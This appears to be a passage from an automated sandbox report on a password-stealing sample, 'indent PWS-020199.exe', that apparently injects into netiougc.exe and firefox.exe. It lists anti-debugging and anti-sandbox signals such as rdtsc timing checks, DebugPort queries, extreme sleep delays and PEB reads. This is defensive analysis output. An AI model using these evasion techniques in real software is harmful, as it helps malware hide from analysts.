            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory allocated: 1A10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory allocated: 3450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory allocated: B680000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory allocated: 7AC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory allocated: B680000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041CA6D rdtsc 2_2_0041CA6D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeWindow / User API: threadDelayed 9781Jump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netiougc.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\indent PWS-020199.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052Thread sleep count: 191 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052Thread sleep time: -382000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052Thread sleep count: 9781 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052Thread sleep time: -19562000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe TID: 8064Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netiougc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0322BF20 FindFirstFileW,FindNextFileW,FindClose,7_2_0322BF20
            Source: C:\Users\user\Desktop\indent PWS-020199.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: netiougc.exe, 00000007.00000002.2904358299.000000000330E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc(K
            Source: indent PWS-020199.exe, 00000000.00000002.1684045855.0000000007A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: D2KAqOqEMu
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905062970.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2313158392.00000175C218C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041CA6D rdtsc 2_2_0041CA6D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004177A3 LdrLoadDll,2_2_004177A3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01548158 mov eax, dword ptr fs:[00000030h]2_2_01548158
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01544144 mov eax, dword ptr fs:[00000030h]2_2_01544144
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01544144 mov eax, dword ptr fs:[00000030h]2_2_01544144
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01544144 mov ecx, dword ptr fs:[00000030h]2_2_01544144
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01544144 mov eax, dword ptr fs:[00000030h]2_2_01544144
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01544144 mov eax, dword ptr fs:[00000030h]2_2_01544144
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AC156 mov eax, dword ptr fs:[00000030h]2_2_014AC156
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6154 mov eax, dword ptr fs:[00000030h]2_2_014B6154
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6154 mov eax, dword ptr fs:[00000030h]2_2_014B6154
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584164 mov eax, dword ptr fs:[00000030h]2_2_01584164
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584164 mov eax, dword ptr fs:[00000030h]2_2_01584164
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01570115 mov eax, dword ptr fs:[00000030h]2_2_01570115
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155A118 mov ecx, dword ptr fs:[00000030h]2_2_0155A118
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155A118 mov eax, dword ptr fs:[00000030h]2_2_0155A118
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155A118 mov eax, dword ptr fs:[00000030h]2_2_0155A118
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155A118 mov eax, dword ptr fs:[00000030h]2_2_0155A118
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov eax, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov ecx, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov eax, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov eax, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov ecx, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov eax, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov eax, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov ecx, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov eax, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E10E mov ecx, dword ptr fs:[00000030h]2_2_0155E10E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E0124 mov eax, dword ptr fs:[00000030h]2_2_014E0124
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E1D0 mov eax, dword ptr fs:[00000030h]2_2_0152E1D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E1D0 mov eax, dword ptr fs:[00000030h]2_2_0152E1D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0152E1D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E1D0 mov eax, dword ptr fs:[00000030h]2_2_0152E1D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E1D0 mov eax, dword ptr fs:[00000030h]2_2_0152E1D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015761C3 mov eax, dword ptr fs:[00000030h]2_2_015761C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015761C3 mov eax, dword ptr fs:[00000030h]2_2_015761C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E01F8 mov eax, dword ptr fs:[00000030h]2_2_014E01F8
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015861E5 mov eax, dword ptr fs:[00000030h]2_2_015861E5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F0185 mov eax, dword ptr fs:[00000030h]2_2_014F0185
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153019F mov eax, dword ptr fs:[00000030h]2_2_0153019F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153019F mov eax, dword ptr fs:[00000030h]2_2_0153019F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153019F mov eax, dword ptr fs:[00000030h]2_2_0153019F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153019F mov eax, dword ptr fs:[00000030h]2_2_0153019F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01554180 mov eax, dword ptr fs:[00000030h]2_2_01554180
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01554180 mov eax, dword ptr fs:[00000030h]2_2_01554180
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AA197 mov eax, dword ptr fs:[00000030h]2_2_014AA197
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AA197 mov eax, dword ptr fs:[00000030h]2_2_014AA197
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AA197 mov eax, dword ptr fs:[00000030h]2_2_014AA197
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156C188 mov eax, dword ptr fs:[00000030h]2_2_0156C188
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156C188 mov eax, dword ptr fs:[00000030h]2_2_0156C188
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536050 mov eax, dword ptr fs:[00000030h]2_2_01536050
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B2050 mov eax, dword ptr fs:[00000030h]2_2_014B2050
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DC073 mov eax, dword ptr fs:[00000030h]2_2_014DC073
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01534000 mov ecx, dword ptr fs:[00000030h]2_2_01534000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01552000 mov eax, dword ptr fs:[00000030h]2_2_01552000
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE016 mov eax, dword ptr fs:[00000030h]2_2_014CE016
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE016 mov eax, dword ptr fs:[00000030h]2_2_014CE016
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE016 mov eax, dword ptr fs:[00000030h]2_2_014CE016
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE016 mov eax, dword ptr fs:[00000030h]2_2_014CE016
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01546030 mov eax, dword ptr fs:[00000030h]2_2_01546030
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AA020 mov eax, dword ptr fs:[00000030h]2_2_014AA020
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AC020 mov eax, dword ptr fs:[00000030h]2_2_014AC020
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015320DE mov eax, dword ptr fs:[00000030h]2_2_015320DE
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B80E9 mov eax, dword ptr fs:[00000030h]2_2_014B80E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AA0E3 mov ecx, dword ptr fs:[00000030h]2_2_014AA0E3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015360E0 mov eax, dword ptr fs:[00000030h]2_2_015360E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AC0F0 mov eax, dword ptr fs:[00000030h]2_2_014AC0F0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F20F0 mov ecx, dword ptr fs:[00000030h]2_2_014F20F0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B208A mov eax, dword ptr fs:[00000030h]2_2_014B208A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A80A0 mov eax, dword ptr fs:[00000030h]2_2_014A80A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015760B8 mov eax, dword ptr fs:[00000030h]2_2_015760B8
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015760B8 mov ecx, dword ptr fs:[00000030h]2_2_015760B8
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015480A8 mov eax, dword ptr fs:[00000030h]2_2_015480A8
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157A352 mov eax, dword ptr fs:[00000030h]2_2_0157A352
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01558350 mov ecx, dword ptr fs:[00000030h]2_2_01558350
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153035C mov eax, dword ptr fs:[00000030h]2_2_0153035C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153035C mov eax, dword ptr fs:[00000030h]2_2_0153035C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153035C mov eax, dword ptr fs:[00000030h]2_2_0153035C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153035C mov ecx, dword ptr fs:[00000030h]2_2_0153035C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153035C mov eax, dword ptr fs:[00000030h]2_2_0153035C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153035C mov eax, dword ptr fs:[00000030h]2_2_0153035C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0158634F mov eax, dword ptr fs:[00000030h]2_2_0158634F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01532349 mov eax, dword ptr fs:[00000030h]2_2_01532349
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155437C mov eax, dword ptr fs:[00000030h]2_2_0155437C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA30B mov eax, dword ptr fs:[00000030h]2_2_014EA30B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA30B mov eax, dword ptr fs:[00000030h]2_2_014EA30B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA30B mov eax, dword ptr fs:[00000030h]2_2_014EA30B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AC310 mov ecx, dword ptr fs:[00000030h]2_2_014AC310
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D0310 mov ecx, dword ptr fs:[00000030h]2_2_014D0310
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01588324 mov eax, dword ptr fs:[00000030h]2_2_01588324
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01588324 mov ecx, dword ptr fs:[00000030h]2_2_01588324
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01588324 mov eax, dword ptr fs:[00000030h]2_2_01588324
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01588324 mov eax, dword ptr fs:[00000030h]2_2_01588324
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015543D4 mov eax, dword ptr fs:[00000030h]2_2_015543D4
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015543D4 mov eax, dword ptr fs:[00000030h]2_2_015543D4
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA3C0 mov eax, dword ptr fs:[00000030h]2_2_014BA3C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA3C0 mov eax, dword ptr fs:[00000030h]2_2_014BA3C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA3C0 mov eax, dword ptr fs:[00000030h]2_2_014BA3C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA3C0 mov eax, dword ptr fs:[00000030h]2_2_014BA3C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA3C0 mov eax, dword ptr fs:[00000030h]2_2_014BA3C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA3C0 mov eax, dword ptr fs:[00000030h]2_2_014BA3C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B83C0 mov eax, dword ptr fs:[00000030h]2_2_014B83C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B83C0 mov eax, dword ptr fs:[00000030h]2_2_014B83C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B83C0 mov eax, dword ptr fs:[00000030h]2_2_014B83C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B83C0 mov eax, dword ptr fs:[00000030h]2_2_014B83C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E3DB mov eax, dword ptr fs:[00000030h]2_2_0155E3DB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E3DB mov eax, dword ptr fs:[00000030h]2_2_0155E3DB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E3DB mov ecx, dword ptr fs:[00000030h]2_2_0155E3DB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155E3DB mov eax, dword ptr fs:[00000030h]2_2_0155E3DB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015363C0 mov eax, dword ptr fs:[00000030h]2_2_015363C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156C3CD mov eax, dword ptr fs:[00000030h]2_2_0156C3CD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C03E9 mov eax, dword ptr fs:[00000030h]2_2_014C03E9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E63FF mov eax, dword ptr fs:[00000030h]2_2_014E63FF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE3F0 mov eax, dword ptr fs:[00000030h]2_2_014CE3F0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE3F0 mov eax, dword ptr fs:[00000030h]2_2_014CE3F0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE3F0 mov eax, dword ptr fs:[00000030h]2_2_014CE3F0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE388 mov eax, dword ptr fs:[00000030h]2_2_014AE388
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE388 mov eax, dword ptr fs:[00000030h]2_2_014AE388
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE388 mov eax, dword ptr fs:[00000030h]2_2_014AE388
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D438F mov eax, dword ptr fs:[00000030h]2_2_014D438F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D438F mov eax, dword ptr fs:[00000030h]2_2_014D438F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8397 mov eax, dword ptr fs:[00000030h]2_2_014A8397
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8397 mov eax, dword ptr fs:[00000030h]2_2_014A8397
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8397 mov eax, dword ptr fs:[00000030h]2_2_014A8397
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0158625D mov eax, dword ptr fs:[00000030h]2_2_0158625D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156A250 mov eax, dword ptr fs:[00000030h]2_2_0156A250
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156A250 mov eax, dword ptr fs:[00000030h]2_2_0156A250
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01538243 mov eax, dword ptr fs:[00000030h]2_2_01538243
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01538243 mov ecx, dword ptr fs:[00000030h]2_2_01538243
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6259 mov eax, dword ptr fs:[00000030h]2_2_014B6259
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AA250 mov eax, dword ptr fs:[00000030h]2_2_014AA250
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A826B mov eax, dword ptr fs:[00000030h]2_2_014A826B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01560274 mov eax, dword ptr fs:[00000030h]2_2_01560274
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4260 mov eax, dword ptr fs:[00000030h]2_2_014B4260
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4260 mov eax, dword ptr fs:[00000030h]2_2_014B4260
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4260 mov eax, dword ptr fs:[00000030h]2_2_014B4260
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A823B mov eax, dword ptr fs:[00000030h]2_2_014A823B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA2C3 mov eax, dword ptr fs:[00000030h]2_2_014BA2C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA2C3 mov eax, dword ptr fs:[00000030h]2_2_014BA2C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA2C3 mov eax, dword ptr fs:[00000030h]2_2_014BA2C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA2C3 mov eax, dword ptr fs:[00000030h]2_2_014BA2C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA2C3 mov eax, dword ptr fs:[00000030h]2_2_014BA2C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015862D6 mov eax, dword ptr fs:[00000030h]2_2_015862D6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C02E1 mov eax, dword ptr fs:[00000030h]2_2_014C02E1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C02E1 mov eax, dword ptr fs:[00000030h]2_2_014C02E1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C02E1 mov eax, dword ptr fs:[00000030h]2_2_014C02E1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE284 mov eax, dword ptr fs:[00000030h]2_2_014EE284
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE284 mov eax, dword ptr fs:[00000030h]2_2_014EE284
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01530283 mov eax, dword ptr fs:[00000030h]2_2_01530283
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01530283 mov eax, dword ptr fs:[00000030h]2_2_01530283
